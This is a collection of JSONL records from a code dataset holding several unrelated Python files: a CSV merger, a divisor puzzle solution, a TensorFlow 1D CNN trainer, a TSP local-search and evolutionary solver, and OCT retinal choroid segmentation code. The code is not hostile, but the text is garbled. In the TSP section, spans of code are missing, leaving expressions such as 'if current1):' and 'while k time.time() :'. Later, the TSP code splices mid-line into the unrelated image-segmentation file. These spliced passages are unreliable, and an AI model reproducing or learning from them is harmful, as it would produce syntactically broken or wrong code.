+{"seq_id":"544260943","text":"import pandas as pd\nimport glob\n\n\npasta = \"Relatórios/Todos os alunos/\" # pasta onde estão os arquivos .csv\narquivos = [f for f in glob.glob(str(pasta) + \"*.csv\", recursive=True)] # cria um array com o endereço e nome dos arquivos\ndf_final = pd.DataFrame() # inicia o dataframe final\n\nfor f in arquivos:\n arquivo = pd.read_csv(f, header=None) # se os arquivos não tiverem cabeçalhos, é necessário header=None\n df_temp = pd.DataFrame(arquivo) # cria um dataframe temporário com o arquivo atual\n df_final = pd.concat([df_final, df_temp]) # concatena no dataframe final\n\nprint(df_final.head(10))\n\ndf_final = df_final.replace('\\n ','', regex=True) # corrige as quebras de linha no campo 'cidade de origem'\ndf_final.to_csv(\"Resultados/csv_final.csv\", index=False, encoding=\"cp1252\") # salva o arquivo na pasta Resultados;\n # o encoding 'cp1252' foi necessário para tratar alguns caracteres que o 'latin-1' não reconhecia","sub_path":"ds.py","file_name":"ds.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"129734565","text":"N = int(input())\ndef make_divisors(n):\n divisors = []\n for i in range(1, int(n**0.5)+1):\n if n % i == 0:\n divisors.append(i)\n #if i != n // i:\n divisors.append(n//i)\n\n divisors.sort()\n return divisors\ndiv_lst = make_divisors(N)\nlen_div = len(div_lst)\nans = float(\"inf\")\nfor i in range(len_div):\n tmp_ans = max(len(str(div_lst[i])) , len(str(div_lst[len_div - i - 1])))\n if ans > tmp_ans:\n\n ans = tmp_ans\nprint(ans)","sub_path":"ABC/57/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"651185001","text":"import numpy\nimport tensorflow\nimport pandas\nimport argparse\nimport sys\nsys.path.append(\"..\")\nimport preprocess_data\n\ntensorflow.contrib.eager.enable_eager_execution()\n\nflag = None\nparser = argparse.ArgumentParser()\nparser.add_argument('--device', default='/cpu:0')\nparser.add_argument('--summary_dir', default='summary/')\nparser.add_argument('--model_dir', default='model/')\nparser.add_argument('--batch_size', default=900)\nparser.add_argument('--max_iteration', default=3000)\nparser.add_argument('--max_learning_rate', default=0.01)\nparser.add_argument('--min_learning_rate', default=0.0001)\nparser.add_argument('--input_dimension', default=[None,92,1])\nparser.add_argument('--cnn1_dimension', default=[9,1,16])\nparser.add_argument('--cnn2_dimension', default=[7,16,32])\nparser.add_argument('--cnn3_dimension', default=[5,32,64])\nparser.add_argument('--cnn4_dimension', default=[3,64,32])\nparser.add_argument('--fc5_dimension', default=16)\nparser.add_argument('--output_dimension', default=2)\nparser.add_argument('--keep_prob', default=0.8)\nflag, unparsed = parser.parse_known_args()\n\ntrain_x, train_y, test_x, test_y = preprocess_data.suit_1d(12)\n\nwith tensorflow.device(flag.device):\n w1 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal(flag.cnn1_dimension, stddev=0.1), name='w1')\n b1 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.cnn1_dimension[2]), name='b1')\n w2 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal(flag.cnn2_dimension, stddev=0.1), name='w2')\n b2 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.cnn2_dimension[2]), name='b2')\n w3 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal(flag.cnn3_dimension, stddev=0.1), name='w3')\n b3 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.cnn3_dimension[2]), name='b3')\n w4 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal(flag.cnn4_dimension, stddev=0.1), name='w4')\n b4 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.cnn4_dimension[2]), name='b4')\n w5 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal((96, flag.fc5_dimension), stddev=0.1), name='w5')\n b5 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.fc5_dimension), name='b5')\n w6 = tensorflow.contrib.eager.Variable(tensorflow.truncated_normal((flag.fc5_dimension, flag.output_dimension), stddev=0.1), name='w6')\n b6 = tensorflow.contrib.eager.Variable(tensorflow.constant(0.1, shape = flag.output_dimension), name='b6')\n\ndef model(x, is_train):\n h1 = tensorflow.nn.leaky_relu(tensorflow.nn.conv1d(x, w1, stride=2, padding='VALID') + b1)\n #h1 = tensorflow.reshape(h1,(-1,1,139,16))\n #h1 = tensorflow.nn.max_pool(h1, [1,1,2,1], [1,1,2,1], 'VALID')\n #h1 = tensorflow.reshape(h1,(-1,74,16))\n\n h2 = tensorflow.nn.leaky_relu(tensorflow.nn.conv1d(h1, w2, stride=2, padding='VALID') + b2)\n #h2 = tensorflow.reshape(h2,(-1,1,74,32))\n #h2 = tensorflow.nn.max_pool(h2, [1,1,2,1], [1,1,2,1], 'VALID')\n #h2 = tensorflow.reshape(h2,(-1,37,32))\n\n h3 = tensorflow.nn.leaky_relu(tensorflow.nn.conv1d(h2, w3, stride=2, padding='VALID') + b3)\n #h3 = tensorflow.reshape(h3,(-1,1,37,64))\n #h3 = tensorflow.nn.max_pool(h3, [1,1,2,1], [1,1,2,1], 'VALID')\n #h3 = tensorflow.reshape(h3,(-1,19,64))\n\n h4 = tensorflow.nn.leaky_relu(tensorflow.nn.conv1d(h3, w4, stride=2, padding='VALID') + b4)\n #h4 = tensorflow.reshape(h4,(-1,1,19,32))\n #h4 = tensorflow.nn.max_pool(h4, [1,1,2,1], [1,1,2,1], 'VALID')\n #h4 = tensorflow.reshape(h4,(-1,10,32))\n h4 = tensorflow.reshape(h4, (x.shape[0], -1))\n\n h5 = tensorflow.nn.leaky_relu(tensorflow.matmul(h4, w5) + b5)\n h5 = tensorflow.contrib.layers.dropout(h5, flag.keep_prob, is_training=is_train)\n\n out = tensorflow.matmul(h5, w6) + b6\n\n return out\n\n@tensorflow.contrib.eager.implicit_value_and_gradients\ndef loss_fun(x, y_, is_train):\n y = model(x, is_train)\n loss = tensorflow.reduce_mean(tensorflow.nn.softmax_cross_entropy_with_logits_v2(labels=y_, logits=y))\n return loss\n\ndef score(x, y_, is_train):\n y = model(x, is_train)\n accuracy = tensorflow.reduce_mean(tensorflow.cast(tensorflow.equal(tensorflow.argmax(y, 1), tensorflow.argmax(y_, 1)), tensorflow.float32))\n return accuracy\n\ndef main(_):\n optimizer = tensorflow.train.AdamOptimizer()\n best_score=0\n\n with tensorflow.device(flag.device):\n num = train_x.shape[0] // flag.batch_size\n for i in range(flag.max_iteration):\n x = train_x[i % num * flag.batch_size:i % num * flag.batch_size + flag.batch_size,:]\n y_ = train_y[i % num * flag.batch_size:i % num * flag.batch_size + flag.batch_size,:]\n learning_rate = flag.max_learning_rate - (flag.max_learning_rate - flag.min_learning_rate) * (i / flag.max_iteration)\n optimizer._lr = learning_rate\n loss, gradient = loss_fun(x, y_, True)\n optimizer.apply_gradients(gradient)\n print(\"step: {} loss: {}\".format(i, loss.numpy()))\n if i % 10 == 0:\n accuracy = score(x, y_, False)\n print(\"step: {} train accuracy: {}\".format(i, accuracy.numpy()))\n if i % 100 == 0:\n accuracy = score(test_x, test_y, False)\n print(\"step: {} test accuracy: {}\".format(i, accuracy.numpy()))\n if accuracy.numpy()>best_score:\n best_score=accuracy.numpy()\n\n print(\"test accuracy: {}\".format(best_score))\n\n Saver = tensorflow.contrib.eager.Saver([w1, w2, w3, w4, w5, w6, b1, b2, b3, b4, b5, b6])\n Saver.save(flag.model_dir + 'cnn_1d')\n\nif __name__ == '__main__':\n tensorflow.app.run(main=main, argv=[sys.argv[0]] + unparsed)","sub_path":"train_suit/cnn_1d.py","file_name":"cnn_1d.py","file_ext":"py","file_size_in_byte":5785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5778992","text":"import numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport time\n\nKROA200_FILENAME =\"kroA200.tsp\"\nKROB200_FILENAME =\"kroB200.tsp\"\n\nclass TSP:\n def __init__(self,filename):\n self.nodes = self.readTSP(filename)\n self.dst_matrix_sorted, self.dst_matrix = self.create_dst_matrix()\n\n def readTSP(self,filename):\n nodelist = []\n with open(filename,'r') as file:\n # Read header\n file.readline()# NAME\n file.readline() # TYPE\n file.readline() # COMMENT\n dimension = file.readline().strip().split()[1] # DIMENSION\n file.readline() # EDGE_WEIGHT_TYPE\n file.readline()\n\n # Read node list\n N = int(dimension)\n for i in range(0, int(dimension)):\n x,y = file.readline().strip().split()[1:]\n nodelist.append([int(x), int(y)])\n\n # Close input file\n\n return nodelist\n\n def count_dist(self,v, u):\n return np.sqrt(((v[0] - u[0]) ** 2)+((v[1] - u[1]) ** 2))\n\n def create_dst_matrix(self):\n dst_matrix_sorted = []\n dst_matrix = []\n for i in range(len(self.nodes)):\n dst_matrix_sorted.append([])\n dst_matrix.append([])\n for j in range(len(self.nodes)):\n dst_matrix_sorted[i].append([self.count_dist(self.nodes[i],self.nodes[j]),j])\n #nearest \n dst_matrix[i].append(dst_matrix_sorted[i].copy())\n dst_matrix_sorted[i].sort()\n return dst_matrix_sorted ,dst_matrix\n\n def rest_nodes(self, cycle):\n nodes =[]\n for i in range(len(self.nodes)):\n if i not in cycle:\n nodes.append(i)\n return nodes\n \n def group_nodes(self,first,second):\n dst = []\n for node in range(len(self.dst_matrix_sorted[0])):\n if node != first and node != second:\n dst1 = self.dst_matrix[node][0][first][0]\n dst2 = self.dst_matrix[node][0][second][0]\n dst.append((node,dst1/dst2))\n dst.sort(key=lambda x: x[1])\n\n return [first]+[p[0] for p in dst[:round(len(dst)/2)]], [second]+[p[0] for p in dst[round(len(dst)/2):]]\n \n def min_index_value(self,indexes, node_neighbors,cluster):\n index = 1 \n \n while node_neighbors[index][1] in indexes or node_neighbors[index][1] not in cluster:\n index +=1\n return node_neighbors[index][1] , node_neighbors[index][0]\n\n def lowest_cost(self,cycle,cluster):\n candidat_lowest = []\n \n for i in range(len(cluster)):\n if cluster[i] not in cycle:\n tmp_lowest = []\n for j in range(-1,len(cycle)-1):\n old_edge = self.dst_matrix[cycle[j]][0][cycle[j+1]][0]\n new_edge_1 =self.dst_matrix[cycle[j]][0][cluster[i]][0]\n new_edge_2 = self.dst_matrix[cluster[i]][0][cycle[j+1]][0]\n tmp_lowest.append([new_edge_1+new_edge_2-old_edge,j+1])\n tmp_lowest.sort(key=lambda x : x[0])\n candidat_lowest.append([tmp_lowest[0][0],tmp_lowest[0][1],cluster[i]])\n \n candidat_lowest.sort(key=lambda x : x[0])\n return candidat_lowest[0][1], candidat_lowest[0][2]\n\n def count_new_dist(self,cycle):\n new_dst = []\n for i in range(-1,len(cycle)-1):\n new_dst.append(self.dst_matrix[ cycle[i] ][0][ cycle[i+1] ][0])\n return new_dst\n\n def cycle_expansion_execute(self,cycle,cluster,size):\n while len(cycle) < size:\n index, point = self.lowest_cost(cycle,cluster)\n cycle.insert(index,point)\n\n return cycle\n\n def cycle_expansion(self,first,second):\n length = len(self.dst_matrix_sorted[0])\n size = length//2\n\n first_cycle = first\n second_cycle = second\n \n\n first_cycle = self.cycle_expansion_execute(first_cycle,self.rest_nodes(second_cycle),size)\n second_cycle = self.cycle_expansion_execute(second_cycle,self.rest_nodes(first_cycle),length-size)\n \n return [first_cycle, second_cycle]\n \n def get_random_sol(self):\n length = len(self.dst_matrix_sorted[0])\n first_cycle = random.sample(range(0, length), length//2)\n second_cycle = [x for x in range(0,length) if x not in first_cycle]\n return [first_cycle,second_cycle]\n\n def draw_lines(self,indexes):\n if indexes:\n x_cords =[]\n y_cords=[]\n for i in indexes:\n x_cords.append(self.nodes[i][0])\n y_cords.append(self.nodes[i][1])\n\n x_cords.append(x_cords[0])\n y_cords.append(y_cords[0])\n plt.plot(x_cords,y_cords) \n\n def save_fig(self, indexes,filename='a'):\n nodess = np.array(self.nodes)\n plt.scatter(nodess[:,0],nodess[:,1])\n self.draw_lines(indexes[0])\n self.draw_lines(indexes[1])\n plt.savefig(filename+'.jpg')\n plt.close()\n\nclass LocalSearch():\n def __init__(self,cycles,nodes,dst_matrix,dst_matrix_sorted,solver):\n self.first , self.second = cycles\n self.nodes = nodes\n self.dst_matrix_sorted = dst_matrix_sorted\n self.dst_matrix = dst_matrix\n self.solver = solver\n self.candidats = []\n def count_candidats(self):\n size = 10\n for i in range(len(self.nodes)):\n self.candidats.append([])\n for j in range(size):\n \n \n self.candidats[i].append(self.dst_matrix_sorted[i][1:size+1][j][1])\n\n def count_dst(self, x ,s1 ,s2):\n \n return self.dst_matrix[x][0][s1][0] + self.dst_matrix[x][0][s2][0]\n\n def count_change(self,x,xs1,xs2,y,ys1,ys2):\n\n \n old_x = self.count_dst(x,xs1,xs2)\n old_y = self.count_dst(y,ys1,ys2)\n if x == ys1:\n ys1 = y\n xs2 = x\n if y == xs1:\n xs1 = x\n ys2 = y\n \n new_x = self.count_dst(x,ys1,ys2)\n new_y = self.count_dst(y,xs1,xs2)\n \n \n return (new_x+new_y) - (old_x+old_y) \n def count_dst_edge(self,x,s1):\n return self.dst_matrix[x][0][s1][0]\n\n def count_change_edge(self,x,xs1,y,ys1):\n old_x = self.count_dst_edge(x,xs1)\n old_y = self.count_dst_edge(y,ys1)\n new_x = self.count_dst_edge(x,ys1)\n new_y = self.count_dst_edge(y,xs1)\n return (new_x+new_y) - (old_x+old_y) \n def revers(self,begin,end,which):\n if which==1:\n tmp = self.first.copy()\n for i in range(end-1,begin,-1):\n \n self.first[begin+(end-i)] = tmp[i]\n else:\n \n tmp = self.second.copy()\n for i in range(end-1,begin,-1):\n self.second[begin+(end-i)] = tmp[i]\n \n def steepest_list(self):\n def inner():\n moves=[]\n length = len(self.first)\n best =0\n for i in range(length):\n for j in range(i+2,length):\n current = self.count_change_edge(self.first[i],self.first[(i+1)%length],self.first[j],self.first[(j-1)%length])\n if current <0:\n if current1):\n return self.count_change_edge(self.first[mini],self.first[(mini+1)%len(self.first)],self.first[maxi],self.first[(maxi-1)%len(self.first)])\n else:\n return 1\n elif x_cycle==2 and y_cycle ==2:\n if (maxi-mini >1):\n return self.count_change_edge(self.second[mini],self.second[(mini+1)%len(self.second)],self.second[maxi],self.second[(maxi-1)%len(self.second)])\n else:\n return 1\n else:\n if x_cycle == 1:\n return self.count_change(self.first[index_x],self.first[index_x-1],self.first[(index_x+1)%len(self.first)],self.second[index_y],self.second[index_y-1],self.second[(index_y+1)%len(self.second)])\n else:\n return self.count_change(self.second[index_x],self.second[index_x-1],self.second[(index_x+1)%len(self.second)],self.first[index_y],self.first[index_y-1],self.first[(index_y+1)%len(self.first)])\n def check_if_is_not_in_moves(move,x,y):\n for i in range(len(move)):\n if (moves[i][1]==x and moves[i][2]==y) or (moves[i][2]==x and moves[i][1]==y):\n return False\n return True\n def count_new_values(moves,x,y,types):\n \n if types == 0:\n a,b=0,0\n length = len (self.first)\n for i in [self.first.index(x),self.first.index(y)]:\n for j in range(length): \n if abs(j-i)>1:\n a = min(i,j)\n b = max(i,j)\n current = self.count_change_edge(self.first[a],self.first[(a+1)%length],self.first[b],self.first[(b-1)%length])\n if current <0:\n if self.first[a] < self.first[b]:\n moves.append((current,self.first[a],self.first[b]))\n else:\n moves.append((current,self.first[b],self.first[a]))\n current = self.count_change(self.first[i],self.first[i-1],self.first[(i+1)%length],self.second[j],self.second[j-1],self.second[(j+1)%length])\n if current <0:\n if self.first[i] < self.second[j]:\n moves.append((current,self.first[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.first[i]))\n if types == 1:\n length = len (self.second)\n for i in [self.second.index(x),self.second.index(y)]:\n \n for j in range(length):\n if abs(j-i)>1:\n current = self.count_change_edge(self.second[i],self.second[(i+1)%length],self.second[j],self.second[(j-1)%length])\n if current <0:\n if self.second[i] < self.second[j]:\n moves.append((current,self.second[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.second[i]))\n current = self.count_change(self.first[i],self.first[i-1],self.first[(i+1)%length],self.second[j],self.second[j-1],self.second[(j+1)%length])\n if current <0:\n if self.first[i] < self.second[j]:\n moves.append((current,self.first[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.first[i]))\n if types ==2:\n \n try:\n i = self.first.index(x)\n length = len (self.second)\n for j in range(length):\n \n current = self.count_change(self.first[i],self.first[i-1],self.first[(i+1)%length],self.second[j],self.second[j-1],self.second[(j+1)%length])\n if current <0:\n if self.first[i] < self.second[j]:\n moves.append((current,self.first[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.first[i]))\n if abs(j-i)>1:\n a = min(i,j)\n b = max(i,j)\n current = self.count_change_edge(self.first[a],self.first[(a+1)%length],self.first[b],self.first[(b-1)%length])\n if current <0:\n if self.first[a] < self.first[b]:\n moves.append((current,self.first[a],self.first[b]))\n else:\n moves.append((current,self.first[b],self.first[a]))\n except:\n pass\n try:\n j = self.second.index(y)\n length = len (self.first)\n for i in range(length):\n \n current = self.count_change(self.first[i],self.first[i-1],self.first[(i+1)%length],self.second[j],self.second[j-1],self.second[(j+1)%length])\n if current <0:\n if self.first[i] < self.second[j]:\n moves.append((current,self.first[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.first[i]))\n if abs(j-i)>1:\n current = self.count_change_edge(self.second[i],self.second[(i+1)%length],self.second[j],self.second[(j-1)%length])\n if current <0:\n if self.second[i] < self.second[j]:\n moves.append((current,self.second[i],self.second[j]))\n else:\n moves.append((current,self.second[j],self.second[i]))\n except:\n pass\n return moves\n\n def update_moves(moves,x,y,types=0):\n k = 0\n \n \n moves = count_new_values(moves,x,y,types)\n \n \n while k time.time() :\n # wybór rodziców (hae_1 jako rozwiazanie wyjsciowe)\n \n \n one = random.randint(0,hae_len-1)\n while True:\n two = random.randint(0,hae_len-1)\n if two != one:\n break\n hae_1, hae_2 = hae[one],hae[two]\n hae_cand = hae_1.copy()\n # usuwanie niepowatarzajacych sie krawędzie\n for h in range(2):\n for i in range(len(hae_cand[0])):\n for j in range(len(hae_2[0])):\n\n if hae_cand[h][i] == hae_2[0][j]:\n if hae_cand[h][(i+1)%leng] != hae_2[0][(j-1)%leng] and hae_cand[h][(i+1)%leng] != hae_2[0][(j+1)%leng]:\n hae_cand[h][(i+1)%leng]=-1\n hae_cand[h][i]=-1\n continue\n if hae_cand[h][i]==hae_2[1][j]: \n if hae_cand[h][(i+1)%leng] != hae_2[1][(j-1)%leng] and hae_cand[h][(i+1)%leng] != hae_2[1][(j+1)%leng]:\n hae_cand[h][(i+1)%leng]=-1\n hae_cand[h][i]=-1\n continue\n # usuwanie pustych wierzcholkow\n for i in range(leng):\n if hae_cand[h][i] != -1 and hae_cand[h][(i-1)%leng] == -1 and hae_cand[h][(i+1)%leng]==-1:\n hae_cand[h][i] = -1\n i = 0\n while i < len(hae_cand[h]):\n if hae_cand[h][i]==-1:\n hae_cand[h].pop(i)\n else:\n i+=1\n # uzupełanianie (rozbudowa cyklu)\n search.first, search.second = solver.cycle_expansion(hae_cand[0],hae_cand[1])\n if types:\n search.steepest_list()\n dist = sum(solver.count_new_dist(search.first))+sum(solver.count_new_dist(search.second))\n \n if hae_1[2]>hae_2[2] and dist < hae_1[2]:\n hae.pop(one)\n hae.append([search.first, search.second,dist])\n if hae_1[2]400)) < len(np.where(iterpo*a[:,0]<400)):\n \n mat[h,0] = 1\n \n else:\n \n mat[h,0] = 1\n \n #Create a length 6 vector for each pixel.\n sm = np.zeros((6,np.shape(a)[0]))\n \n #Cycle through each pixel.\n for i in range(np.shape(a)[0]):\n \n try:\n \n #Populate each length 6 vector with the intensities of the \n # neighborhood of 5 pixels just below each pixel in addition \n # to that pixel.\n sm[:,i] = Ii[a[i,1],a[i,0]:a[i,0]+6]\n \n except:\n \n pass\n \n #Find the maximum intensity pixel from each length 6 vector.\n smi = np.amax(sm, axis=0)\n \n #Store the modified intensity sum.\n mat[h,1] = sum(smi)\n mat[h,2] = h\n \n nnobj = []\n \n #If ind is 1, perform additional object-location-dependent operations.\n if ind == 1:\n \n ai = np.where(mat[:,0]==1)[0]\n \n #Checks if there are objects indexed by mat.\n if len(ai) > 0:\n \n #Sort the objects by modified intensity sum.\n mati = mat[ai,:]\n mati = mati[mati[:,1].argsort(),]\n \n #Append to nnobj the largest object by modified intensity sum.\n nnobj.append(nobj[int(mati[mati.shape[0]-1,2])][0])\n \n #Dead code that would have found objects meeting some\n # object-location-dependent criteria.\n ai = np.where(mat[:,0]==2)[0]\n \n mati = mat[ai,:]\n mati = mati[mati[:,1].argsort(),]\n \n if len(ai) > 0:\n \n nnobj.append(nobj[int(mati[mati.shape[0]-1,2])][0])\n \n #nbc is the final refined completely-connected BM segmentation.\n nbc = np.zeros(bc.shape)\n \n for h in range(np.shape(nnobj)[0]):\n \n a = nnobj[h]\n \n #If the largest object by modified intensity sum has at least 5 pixels,\n # it's a keeper.\n if a.shape[0] > 5:\n \n for l in range(a.shape[0]):\n \n nbc[a[l,0],a[l,1]] = 1\n \n return nbc\n \n #Blur the bscan.\n w = cv2.GaussianBlur(im, (7,7), sigmaX=5, sigmaY=5)\n \n interpo = 2\n \n #Compute the combination of receptive fields on the down-scaled blurred bscan.\n #Find the binarized contour bc for the down-scaled image.\n #Perform a series of morphological operations to refine detected edges.\n #This binarized contour represents the general region-of-interest being analysed \n # above the choroid.\n bc = computeCORF(np.transpose(w[::interpo,::interpo]), 2.5, 0.12, 1)[2]\n se6 = morph.square(6, dtype=np.float64)\n bc_dilated = morph.binary_dilation(bc, se6)\n se4 = morph.square(4, dtype=np.float64)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n se1 = morph.disk(1, dtype=np.float64)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc = np.transpose(bc_eroded2)\n \n interpo = 2\n _, N = bc.shape\n O = np.zeros((N, 1))\n O[:,0] = np.NaN\n \n #Isolate leading coordinates of the binarized contour.\n for i in range(N)[::3]:\n \n a = np.where(bc[:,i]==1)\n \n if np.shape(a) != (1,0):\n \n O[i] = a[0][0]\n\n #Fill in gaps and perform lowess smoothing.\n replaceNaNValues(O)\n laydownii = lowess(O[:,0], list(range(N)), 0.05, is_sorted=True, missing='drop', return_sorted=False)\n \n #Up-scale the limiting membrane.\n pre_LM = np.zeros((1536,1))\n pre_LM[:,0] = np.NaN\n pre_LM[::interpo,0] = np.multiply(interpo, laydownii)\n \n #Fill in gaps and perform lowess smoothing.\n replaceNaNValues(pre_LM)\n LM = lowess(pre_LM[:,0], list(range(1536)), 0.05, is_sorted=True, missing='drop', return_sorted=False)\n \n #Find the binarized contour using different CORF parameters. This broader \n # is used to treat the area above the choroid in addition to the choroid area.\n _, _, bc = computeCORF(np.transpose(w[::interpo,::interpo]), 4, 0.01, 1)\n bc_dilated = morph.binary_dilation(bc, se6)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc = np.transpose(bc_eroded2)\n \n _, N = bc.shape\n O = np.zeros((N,1))\n O[:,0] = np.NaN\n \n #Isolate leading coordinates of the binarized contour.\n for i in range(N)[::3]:\n \n a = np.where(bc[:,i]==1)\n \n if np.shape(a) != (1,0):\n \n O[i] = a[0][0]\n \n #Fill in gaps and perform lowess smoothing.\n replaceNaNValues(O)\n laydowni = lowess(O[:,0], list(range(N)), 0.5, is_sorted=True, missing='drop', return_sorted=False)\n \n mask1 = np.ones(bc.shape, dtype=np.bool_)\n \n #Mask out the region of interest for segmenting the choroid.\n for l in range(len(laydowni)):\n \n try:\n \n mask1[:int(round(laydowni[l]))+1,l] = 0\n \n except:\n \n pass\n \n mask11 = np.ones(bc.shape, dtype=np.bool_)\n \n #Mask out the region not-of-interest inadvertendly created by poor image \n # registration.\n for l in range(len(laydowni)):\n \n try:\n \n mask11[int(round(laydowni[l]))+5:,l] = 0\n \n except:\n \n pass\n \n #New addition not in original Matlab code for improved image registration.\n _, _, bc = computeCORF(np.transpose(w[::interpo,::interpo]), 4, 0.08, 1)\n bc_dilated = morph.binary_dilation(bc, se6)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc = np.transpose(bc_eroded2)\n \n bc = np.multiply(bc, mask1)\n \n #Find the edge from the binarized contour representing the top of the BM.\n bc3 = refinebmoampcr(bc, np.transpose(im[::interpo,::interpo]), 1, interpo)\n \n a,b = np.where(bc3 > 0)\n \n #Get a one-to-one representation of the top of the BM then smooth.\n O = np.zeros((N,1))\n O[b,0] = a\n O[::2,0] = np.NaN\n \n replaceNaNValues(O)\n layup = lowess(O[:,0], list(range(N)), 0.1, is_sorted=True, missing='drop', return_sorted=False)\n \n #Fill mask to 20 pixels below the top of the BM.\n mask2 = np.ones(bc.shape, dtype=np.bool_)\n \n for l in range(len(layup)):\n \n try:\n \n mask2[int(round(layup[l]))+20:,l] = 0\n \n except:\n \n pass\n \n #Create up-scaled version of the top of the BM segmentation.\n BM = np.zeros((1536,1))\n BM[:,0] = np.NaN\n BM[::interpo,0] = np.multiply(interpo, layup)\n \n #Smooth it twice.\n replaceNaNValues(BM)\n BM = lowess(BM[:,0], list(range(1536)), 0.05, is_sorted=True, missing='drop', return_sorted=False)\n BMi = lowess(BM, list(range(1536)), 0.2, is_sorted=True, missing='drop', return_sorted=False)\n \n #Choroid upper bound estimate up-scaled segmentation.\n CHR = np.zeros((1536,1))\n CHR[:,0] = np.NaN\n CHR[::interpo,0] = np.multiply(interpo, laydowni)\n \n replaceNaNValues(CHR)\n CHR = lowess(CHR[:,0], list(range(1536)), 0.05, is_sorted=True, missing='drop', return_sorted=False)\n \n #BMim is the composite of the LM, BMi, and CHR segmentations.\n BMim = np.zeros(im.shape)\n \n for i in range(len(BM)):\n \n try:\n \n BMim[int(round(LM[i])),i] = 1\n BMim[int(round(BMi[i])),i] = 1\n BMim[int(round(CHR[i])),i] = 1\n \n except:\n \n pass\n \n #BMimr is the composite of the BMi and CHR segmentations.\n BMimr = np.zeros(im.shape)\n \n for i in range(len(BM)):\n \n try:\n \n BMimr[int(round(BMi[i])),i] = 1\n BMimr[int(round(CHR[i])),i] = 1\n \n except:\n \n pass\n \n #Down-scale a copy of the bscan.\n newB = im\n newBi = newB[::interpo,::interpo]\n \n #Mask the original binarized contour by the composite of mask1 and mask2.\n bc = np.multiply(bc, np.multiply(mask1, mask2))\n\n mask3 = np.ones(bc.shape, dtype=np.bool_)\n \n #Down-scale the Spectralis-segmented Bruche's Membrane.\n BMM = old_div(BMM[::interpo],interpo)\n \n #Create a mask for below the original Spectralis-segmented BM.\n for l in range(len(BMM)):\n \n try:\n \n mask3[:int(round(BMM[l]))+1,l] = 0\n \n except:\n \n pass\n \n #Mask out the region above the original Spectralis-segmented BM.\n bc = np.multiply(bc, mask3)\n \n count = 0\n #Cycle through long-axis indices.\n for iop in range(bc.shape[1]):\n \n #Find the coordinates in each column.\n ao = bc[:,iop]\n zz = np.where(ao > 0)\n \n #Increment count for each nonempty column.\n if np.shape(zz) != (1,0):\n \n count += 1\n \n bc01 = bc\n \n test_ONHRC_radial = False\n #If ratio of number of nonempty columns to total columns <0.65:\n # Use larger Gaussian kernel, denoise, recompute CORF, and apply morph-ops.\n if float(count)/len(BMM) < 0.65:\n \n w = cv2.GaussianBlur(im, (21,21), sigmaX=20, sigmaY=20)\n \n #restore_imagev2 is computationally expensive.\n if not test_ONHRC_radial:\n \n AA = denoise.restore_imagev2(w.astype(float)[::interpo,::interpo]-20, 50, 200, 0.02, 1)\n \n else:\n \n AA = im.astype(float)[::interpo,::interpo]-20\n \n _, _, bc01 = computeCORF(np.transpose(AA), 3, 0.0605, 11)\n \n bc01 = np.transpose(bc01)\n \n #Note that we add bc and bc01 together here (original + denoised).\n bc = morph.remove_small_objects(bc+bc01, 5, connectivity=8)\n bc_dilated = morph.binary_dilation(bc, se6)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc01 = bc\n \n #Mask out the region above the original Spectralis-segmented BM for new contour.\n bc = np.multiply(bc01, np.multiply(mask3, newBi))\n \n count = 0\n #Cycle through long-axis indices.\n for iop in range(bc.shape[1]):\n \n #Find the coordinates in each column.\n ao = bc[:,iop]\n zz = np.where(ao > 0)\n \n #Increment count for each nonempty column.\n if np.shape(zz) != (1,0):\n \n count += 1\n \n bc01 = bc\n \n #If ratio of number of nonempty columns to total columns <0.60:\n # Do same as for when <0.65 but with different computeCORF parameters.\n if float(count)/len(BMM) < 0.6:\n \n w = cv2.GaussianBlur(im, (21,21), sigmaX=20, sigmaY=20)\n \n if not test_ONHRC_radial:\n #restore_imagev2 is expensive.\n AA = denoise.restore_imagev2(w.astype(float)[::interpo,::interpo]-20, 50, 200, 0.02, 1)\n \n else:\n \n AA = im.astype(float)[::interpo,::interpo]-20\n \n _, _, bc01 = computeCORF(np.transpose(AA), 5, 0.001, 1)\n \n bc01 = np.transpose(bc01)\n \n #Note that we add bc and bc01 together here (previous + denoised).\n bc = morph.remove_small_objects(bc.astype(np.bool_)+bc01, 5, connectivity=8)\n bc_dilated = morph.binary_dilation(bc, se6)\n bc_eroded = morph.binary_erosion(bc_dilated, se4)\n bc_eroded2 = morph.binary_erosion(bc_eroded, se1)\n bc01 = bc\n \n #Mask out the bscan above the Spectralis BM and outside of the new contour.\n AA = np.multiply(bc01, np.multiply(newBi, mask3))\n AA = np.transpose(AA)\n \n if test_ONHRC_radial:\n AA = expose.rescale_intensity(AA, out_range=(0,255.0))\n AA[np.where(AA < 8)] = 0.0\n \n #Create a one-to-one segmentation from AA.\n OO = np.zeros((AA.shape[0], 1))\n OO[:,0] = np.NaN\n \n #Cycle 